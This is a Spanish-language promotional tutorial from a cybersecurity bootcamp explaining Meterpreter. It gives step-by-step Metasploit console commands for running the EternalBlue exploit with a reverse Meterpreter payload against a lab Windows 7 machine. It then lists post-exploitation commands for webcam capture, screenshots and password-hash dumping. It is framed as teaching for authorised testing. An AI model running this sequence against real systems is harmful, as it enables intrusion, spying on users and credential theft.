Meterpreter es un payload avanzado y dinámico de la suite Metasploit que se ejecuta en la memoria del sistema objetivo sin escribir archivos en el disco, permitiendo realizar tareas de post-explotación remota como la ejecución de comandos, recopilación de credenciales y control de dispositivos en auditorías de seguridad.
¿Sabes qué es Meterpreter y para qué se utiliza esta herramienta en ciberseguridad? En este artículo, hablaremos sobre uno de los payloads más potentes y versátiles. Si estás buscando especializarte en hacking ético, análisis de vulnerabilidades y seguridad defensiva mediante un bootcamp de tecnología intensivo, dominar el uso de herramientas como Metasploit y sus cargas útiles te dará las competencias necesarias para auditar e integrar controles de seguridad en entornos corporativos.
A continuación, te explicaremos qué es Meterpreter y cómo se usa en ciberseguridad.
¿Qué es Meterpreter?
Meterpreter es un payload que permite ejecutar tareas de forma remota en una máquina. Es un software que se ejecuta en un nivel muy bajo de la máquina, por lo que es bastante difícil de detectar.
Por medio del payload Meterpreter es posible conectarse a la webcam del ordenador vulnerado, a su teclado, tomar capturas en pantalla y, en resumen, hacer cualquier cosa con él.
No obstante, a la hora de aprender qué es Meterpreter, es importante tener en cuenta que el software no presenta las mismas funciones ni se comporta igual en todos los sistemas operativos. La versión más completa de este programa es Meterpreter para Windows.
«El mayor cambio ha sido el crecimiento técnico en protección de datos, pruebas de penetración y análisis de vulnerabilidades para la industria.»
Conoce la historia real de Álvaro Sanz, quien tras formarse en ciberseguridad dio el salto profesional definitivo hasta convertirse en Cybersecurity Engineer en el equipo de defensa (Blue Team) de Airbus Cybersecurity.
¿Cómo utilizar Meterpreter con Metasploit?

🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴
Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada
👉 Prueba gratis el Bootcamp en Ciberseguridad por una semanaAhora que sabes qué es Meterpreter, hablaremos sobre un método para utilizarlo. La siguiente explicación está hecha con fines académicos. Meterpreter es un payload diseñado para probar el nivel de riesgo de una vulnerabilidad informática y ayudar a aumentar la seguridad del sistema. Su uso con fines maliciosos se considera hacking de sombrero negro. Es decir, es ilegal.
Para usar un payload de tipo Meterpreter con Metasploit, puedes seguir el siguiente proceso:
- Primero, crea dos máquinas virtuales en un software de virtualización. Una de ellas que sea una versión desactualizada de Windows 7 (es decir, del 2011 o 2012) y la otra que tenga un sistema operativo Kali Linux.
- Para iniciar la consola de Metasploit, abre una terminal en Kali Linux y ejecuta el siguiente comando:
msfconsole
Para buscar un exploit para Windows, utiliza el comando:
search exploit windows
Si ya conoces el exploit que usarás, también puedes buscarlo por su nombre. Por ejemplo, para encontrar el exploit «EternalBlue» ejecuta:
search eternalblue
Cuando hayas escogido el exploit, copia su ruta y comienza a utilizarlo con el comando «use», de la siguiente forma:
use exploit/windows/smb/ms17_010_eternalblue
Metasploit cuenta con más de 2.000 exploits entre los que elegir. Para este ejemplo, hemos escogido un exploit de tipo EternalBlue para Windows. Sin embargo, no es el único exploit capaz de ejecutar un payload Meterpreter, así que siéntete libre de experimentar con varios en tus propios laboratorios.
Antes de configurar el exploit, para entender mejor qué es Meterpreter y cómo se usa, veremos cómo escoger y configurar el payload. Utiliza el comando «search» para encontrar un payload que se ajuste a tus necesidades. Por ejemplo:
search payload windows
De ese modo encontrarás varias alternativas de payloads. Si quieres elegir uno de tipo Meterpreter, busca uno cuya ruta contenga el término «meterpreter». Luego, para utilizarlo junto al exploit, ejecuta el comando «set payload» seguido por la ruta del payload seleccionado. Por ejemplo:
set payload windows/x64/meterpreter/reverse_http
Ten presente que, si no eliges algún payload, metasploit meterpreter ejecutará uno por defecto con el exploit. Para saber qué payload ejecuta de manera predeterminada un exploit, utiliza el comando «show options».
Ahora, antes de ejecutar el exploit, es necesario configurarlo. Para saber qué variables es obligatorio definir, ejecuta el comando:
show options
Para el exploit EternalBlue que hemos elegido, los datos obligatorios son «LPORT = puerto local» y «RHOSTS = ip del ordenador de la víctima». En Metasploit, las variables se definen con el comando set. Es decir, para establecer sus valores ejecutaríamos los comandos:
set LPORT 6666
set RHOSTS 192.168.172.128
En este ejemplo, el puerto local se ha escogido de forma aleatoria por ser local. La dirección IP de RHOSTS es la de la máquina Windows 7 y, para fines del ejemplo, supondremos que es 192.168.172.128.
Finalmente, para ejecutar el exploit junto con el payload de Meterpreter, utiliza el comando:
exploit
Después de seguir este proceso, tendrás acceso a la máquina virtual con Windows 7 por medio de Meterpreter. Para usar el payload dentro de la máquina, te recomendamos aprender los comandos de Meterpreter.
Comandos de Meterpreter
El siguiente paso para saber cómo usar Meterpreter se basa en entender las funciones de sus comandos.
- Para ver toda la lista de comandos:
help - Para ejecutar el payload en segundo plano:
background - Para ver tus sesiones de postexplotación:
sessions - Para acceder a una de las sesiones:
sessions -i 1 - Para ver información básica del equipo explotado:
sysinfo - Para ver información sobre sus direcciones IP:
ipconfig - Para ver todos los procesos y usuarios asociados:
ps - Para ver el nivel de privilegios actual:
getuid - Para ver un listado de las webcams conectadas:
webcam_list - Para tomar una foto instantánea con la webcam:
webcam_snap - Para ver una transmisión de vídeo en vivo desde la webcam:
webcam_stream - Para tomar una captura de la pantalla:
screenshot - Para ver las funciones hash de las contraseñas de los usuarios:
hashdump
| Comando | Función Principal | Fase de Auditoría |
|---|---|---|
sysinfo / getuid |
Obtiene información del sistema y nivel de privilegios. | Reconocimiento inicial post-explotación. |
hashdump |
Extracción de hashes de contraseñas de la memoria SAM. | Obtención de credenciales / Elevación. |
screenshot / webcam_snap |
Captura interactiva de pantalla y dispositivos multimedia. | Demostración de impacto en pentesting. |
Estos son solo algunos de los comandos más interesantes para comenzar a aprender cómo usar Meterpreter para Windows. En conclusión, se trata de un payload con alcances muy significativos y, en pentesting, permite poner a prueba el nivel de peligro de una vulnerabilidad.
Si quieres saber más sobre qué es Meterpreter y cómo utilizarlo en hacking ético, en KeepCoding tenemos una formación especialmente pensada para ti. Ingresa a nuestro Ciberseguridad Full Stack Bootcamp y persigue tus objetivos al especializarte en este ámbito del sector IT en tan solo 7 meses. ¡Inscríbete ya y cambia tu vida!
Conclusión
Meterpreter es una de las cargas útiles más eficaces para evaluar el impacto real de las brechas de seguridad dentro de auditorías autorizadas. Entender su arquitectura in-memory y la sintaxis de sus comandos es fundamental tanto para auditores de seguridad como para ingenieros defensivos encargados de detectar y mitigar vectores de ataque en infraestructuras informáticas.

Si quieres aprender técnicas avanzadas de pentesting, bastionado de redes, seguridad en la nube y auditoría ofensiva y defensiva con el apoyo de expertos en activo, descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding e impulsa tu carrera tecnológica hoy mismo.
Para profundizar en los aspectos metodológicos del pentesting y la prevención de vulnerabilidades, te recomendamos consultar las guías de auditoría del Open Web Application Security Project (OWASP).
Preguntas Frecuentes sobre Meterpreter y Metasploit
¿Qué es Meterpreter y para qué se utiliza?
Meterpreter es un payload avanzado e inyectable en memoria utilizado en auditorías de seguridad y ciberseguridad que permite la ejecución remota de comandos en una máquina comprometida de forma sigilosa y difícil de detectar.
¿Cómo se utiliza Meterpreter con Metasploit?
Meterpreter se configura dentro del framework Metasploit seleccionando un exploit adecuado, estableciendo el payload mediante ‘set payload’, configurando los parámetros requeridos (como la IP de la víctima y el puerto local) y ejecutando el comando ‘exploit’.
¿Cuáles son algunos comandos básicos de Meterpreter?
Entre los comandos más comunes destacan ‘sysinfo’ para ver detalles del sistema, ‘getuid’ para comprobar el nivel de privilegios, ‘ps’ para listar procesos, ‘screenshot’ para capturar pantalla y ‘hashdump’ para obtener los hashes de contraseñas.
¿En qué sistemas operativos funciona Meterpreter?
Meterpreter está disponible para múltiples plataformas, aunque su versión más completa y con mayor cantidad de funcionalidades avanzadas es la diseñada para sistemas Microsoft Windows.



